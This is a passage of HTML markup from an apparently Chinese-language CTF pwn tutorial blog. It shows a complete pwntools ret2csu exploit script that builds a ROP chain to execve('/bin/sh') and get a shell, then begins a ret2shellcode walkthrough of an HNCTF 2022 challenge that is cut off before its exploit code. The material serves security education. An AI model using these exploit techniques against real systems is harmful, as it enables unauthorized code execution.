0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">10<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">csu2<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># add rsp, 8<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop rbx<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop rbp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">          <\/span><span style=\"color: #616E88\"># pop r12<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop r13<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop r14<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">execve_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #616E88\"># pop r15<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">csu1<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">38<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">main<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u5199\u51fa\u653b\u51fb\u4ee3\u7801\u5982\u4e0b\uff08\u7531\u4e8e\u8d5b\u9898\u73af\u5883\u65e9\u5df2\u5173\u95ed\uff0c\u6545\u8fd9\u91cc\u5728\u672c\u5730\u6253\uff09\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import*\n\np = process(\".\/pwn\")\nelf = ELF(\".\/pwn\")\n\ncsu1 = 0x4013A0\ncsu2 = 0x4013B6\nsh = 0x404090\nmain = 0x401275\nexecve_got = elf.got&#91;\"execve\"&#93;\n\np.sendlineafter(b'The little doll is tired, say goodnight to her~\\n', b'\/bin\/sh\\x00')\n\npayload = b'\\x00' * 0x10 + b'=Triode='\npayload += p64(csu2)\npayload += p64(0)           # add rsp, 8\npayload += p64(0)           # pop rbx\npayload += p64(1)           # pop rbp\npayload += p64(sh)          # pop r12\npayload += p64(0)           # pop r13\npayload += p64(0)           # pop r14\npayload += p64(execve_got)  # pop r15\npayload += p64(csu1)\npayload += b'\\x00' * 0x38 + p64(main)\n\np.sendlineafter(b'What else do you want to do?\\n', payload)\np.interactive()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: #81A1C1\">import*<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">process<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">.\/pwn<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">elf <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">ELF<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">.\/pwn<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">csu1 <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4013A0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">csu2 <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4013B6<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">sh <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">404090<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">main <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">401275<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">execve_got <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">execve<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">The little doll is tired, say goodnight to her~<\/span><span style=\"color: #EBCB8B\">\\n<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">\/bin\/sh<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">10<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">csu2<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># add rsp, 8<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop rbx<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop rbp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">          <\/span><span style=\"color: #616E88\"># pop r12<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop r13<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop r14<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">execve_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #616E88\"># pop r15<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">csu1<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">38<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">main<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">What else do you want to do?<\/span><span style=\"color: #EBCB8B\">\\n<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">interactive<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u8fd0\u884c\u53ef\u4ee5\u5f97\u5230shell\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-38.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-38.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"424\" height=\"206\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-38.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-171\"  sizes=\"auto, (max-width: 424px) 100vw, 424px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading\">ret2shellcode<\/h2>\n\n\n\n<p>ret2shellcode\u6307\u901a\u8fc7\u6808\u6ea2\u51fa\u63a7\u5236\u7a0b\u5e8f\u6267\u884cshellcode\uff0c\u800cshellcode\u5f80\u5f80\u9700\u8981\u6211\u4eec\u81ea\u5df1\u7f16\u5199\uff0c\u800c\u5728<code>pwntools<\/code>\u4e2d\u53ef\u4ee5\u5229\u7528<code>asm(shellcraft.sh())<\/code>\u8fdb\u884c\u7f16\u5199\uff0c\u5728\u4e00\u4e9b\u60c5\u51b5\u4e0b\u4e5f\u4f1a\u7528\u5230\u4e00\u4e9b\u7279\u6b8a\u7684shellcode\uff0c\u6b64\u65f6\u6211\u4eec\u8981\u5411\u7a0b\u5e8f\u4e2d\u586b\u5145\u53ef\u6267\u884c\u7684\u4ee3\u7801\u3002<\/p>\n\n\n\n<p>\u5728\u6808\u6ea2\u51fa\u7684\u57fa\u7840\u4e0a\uff0c\u82e5\u60f3\u6267\u884cshellcode\uff0c\u5219\u6211\u4eec\u5199\u5165shellcode\u7684\u533a\u57df\u4e00\u5b9a\u8981\u6709\u53ef\u6267\u884c\u6743\u9650\uff08\u4f8b\u5982<code>bss<\/code>\u6bb5\uff0c<code>data<\/code>\u6bb5\uff0c\u6ca1\u6709\u88ab\u4fdd\u62a4\u7684<code>stack<\/code>\u6bb5\u4ee5\u53ca\u53ef\u5199\u53ef\u6267\u884c\u7684<code>heap<\/code>\u6bb5\uff09<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4f8b\uff1a[HNCTF 2022 Week1] ret2shellcode<\/h4>\n\n\n\n<p>\u9898\u76ee\uff1a<a href=\"https:\/\/www.nssctf.cn\/problem\/2934\">HNCTF 2022 Week1-ret2shellcode | NSSCTF<\/a><\/p>\n\n\n\n<p>checksec\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-39.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-39.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"228\" height=\"109\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-39.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-172\"\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u53d1\u73b0\u5806\u6808\u4e0d\u53ef\u6267\u884c\uff0c\u4f46\u662f\u6ca1\u6709\u5176\u4ed6\u4fdd\u62a4\uff0c\u5229\u7528IDA\u6253\u5f00\u540e\u53ef\u4ee5\u770b\u5230main\u51fd\u6570\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-40.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-40.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"620\" height=\"198\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-40.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-173\"  sizes=\"auto, (max-width: 620px) 100vw, 620px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u6211\u4eec\u9700\u8981\u8f93\u5165\u4e00\u4e2a\u5b57\u7b26\u4e32<code>s<\/code>\uff0c\u53d1\u73b0\u5728\u8fd9\u4e2a<code>read<\/code>\u51fd\u6570\u5904\u5b58\u5728\u6808\u6ea2\u51fa\uff0c\u4f46\u53ea\u80fd\u521a\u521a\u597d\u8986\u76d6\u5230\u8fd4\u56de\u5730\u5740\uff0c\u53c8\u53ef\u4ee5\u770b\u5230\uff1a<code>strcpy(buff, s)<\/code>\u5c06\u6211\u4eec\u8f93\u5165\u7684\u5b57\u7b26\u4e32<code>s<\/code>\u88ab\u590d\u5236\u5230\u4e86<code>buff<\/code>\u4e0a\u9762\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\uff0c<code>buff<\/code>\u662f\u5728<code>bss<\/code>\u6bb5\u4e0a\u7684\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-41.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-41.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"401\" height=\"74\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-41.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-174\"  sizes=\"auto, (max-width: 401px) 100vw, 401px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u5229\u7528ret2shellcode\u6280\u672f\uff0c\u5411<code>buff<\/code>\u4e2d\u5199\u5165shellcode\uff0c\u7136\u540e\u901a\u8fc7\u6808\u6ea2\u51fa\u6765\u6267\u884c<code>buff<\/code>\u4e2d\u7684shellcode\u5373\u53ef\uff0c\u653b\u51fb\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" 